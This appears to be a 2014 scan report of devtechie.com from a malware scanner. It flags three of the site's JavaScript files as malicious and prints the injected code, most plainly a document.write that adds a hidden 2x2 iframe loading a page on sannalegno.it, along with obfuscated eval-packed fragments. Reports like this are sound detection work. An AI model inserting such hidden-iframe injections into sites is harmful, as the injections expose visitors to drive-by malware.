Scanned pages/files
| Request | Server response | Status |
http://devtechie.com/ | 200 OK Content-Length: 68678 Content-Type: text/html | clean |
http://devtechie.com/js.axd?path=Scripts%2fjquery.js | 200 OK Content-Length: 78757 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sannalegno.it/ewhd.html?j=644257></iframe>');
(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://sannalegno.it/ewhd.html?j=644257 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sannalegno.it/ewhd.html?j=644257> | ||
http://devtechie.com/js.axd?path=Scripts%2fjquery.cookie.js | 200 OK Content-Length: 4318 Content-Type: text/javascript | clean |
http://devtechie.com/js.axd?path=Scripts%2fjquery.validate.min.js | 200 OK Content-Length: 25399 Content-Type: text/javascript | clean |
http://devtechie.com/js.axd?path=Scripts%2fjquery-jtemplates.js | 200 OK Content-Length: 9732 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('');
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a(37.b&&!37.b.38){(9(b){6 m=9(s,A,f){5.1M=[];5.1u={};5.2p=E;5.1N={};5.1c={};5.f=b.1m({1Z:1f,3a:1O,2q:1f,2r:1f,3b:1O,3c:1O}, Antivirus reports:
| ||
http://devtechie.com/js.axd?path=Scripts%2fjson2.js | 200 OK Content-Length: 17356 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('');
 if (!this.JSON) { this.JSON = {}; } (function () { function f(n) { return n < 10 ? '0' + n : n; } if (typeof Date.prototype.toJSON !== 'function') { Date.prototype.toJSON = function (key) { return isFinite(this.valueOf()) ? this.getUTCFullYear() + '-' + replace(/(?:^|:|,)(?:\s*\[)+/g, ''))) { j = eval('(' + text + ')'); return typeof reviver === 'function' ? walk({ '': j }, '') : j; } throw new SyntaxError('JSON.parse'); }; } } ()); Antivirus reports:
| ||
http://devtechie.com/Scripts/syntaxhighlighter/shCore.js | 200 OK Content-Length: 16190 Content-Type: application/javascript | clean |
http://devtechie.com/Scripts/syntaxhighlighter/shBrushCSharp.js | 200 OK Content-Length: 2589 Content-Type: application/javascript | clean |
http://devtechie.com/Scripts/syntaxhighlighter/shBrushCss.js | 200 OK Content-Length: 5783 Content-Type: application/javascript | clean |
http://devtechie.com/Scripts/syntaxhighlighter/shBrushJScript.js | 200 OK Content-Length: 1697 Content-Type: application/javascript | clean |
http://devtechie.com/Scripts/syntaxhighlighter/shBrushPlain.js | 200 OK Content-Length: 781 Content-Type: application/javascript | clean |
http://devtechie.com/Scripts/syntaxhighlighter/shBrushSql.js | 200 OK Content-Length: 3116 Content-Type: application/javascript | clean |
http://devtechie.com/Scripts/syntaxhighlighter/shBrushVb.js | 200 OK Content-Length: 2335 Content-Type: application/javascript | clean |
http://devtechie.com/Scripts/syntaxhighlighter/shBrushXml.js | 200 OK Content-Length: 2065 Content-Type: application/javascript | clean |
http://devtechie.com/js.axd?path=http%3a%2f%2fdevtechie.com%2fWebResource.axd%3fd%3dVjwlIqi7esLpp02YYsQj5vb-ws10arl6pmfvuDlShTmJbrmWkcW18HyiP3-g-C-LuV80Q3XQAy-AV4njmeyBLCbw27o1%26amp%3bt%3d635198732332401351 | 200 OK Content-Length: 10087 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: devtechie.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 17 Apr 2014 14:33:25 GMT
Server: Microsoft-IIS/8.5
Content-Length: 68678
Content-Type: text/html; charset=utf-8
Content-Script-Type: text/javascript
Content-Style-Type: text/css
X-Powered-By: ASP.NET
...68678 bytes of data.
GET / HTTP/1.1
Host: devtechie.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 17 Apr 2014 14:33:25 GMT
Server: Microsoft-IIS/8.5
Content-Length: 68678
Content-Type: text/html; charset=utf-8
Content-Script-Type: text/javascript
Content-Style-Type: text/css
X-Powered-By: ASP.NET
...68678 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: devtechie.com
Referer: http://www.google.com/search?q=devtechie.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: devtechie.com
Referer: http://www.google.com/search?q=devtechie.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=devtechie.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://devtechie.com/
Result: devtechie.com is not infected or malware details are not published yet.
Result: devtechie.com is not infected or malware details are not published yet.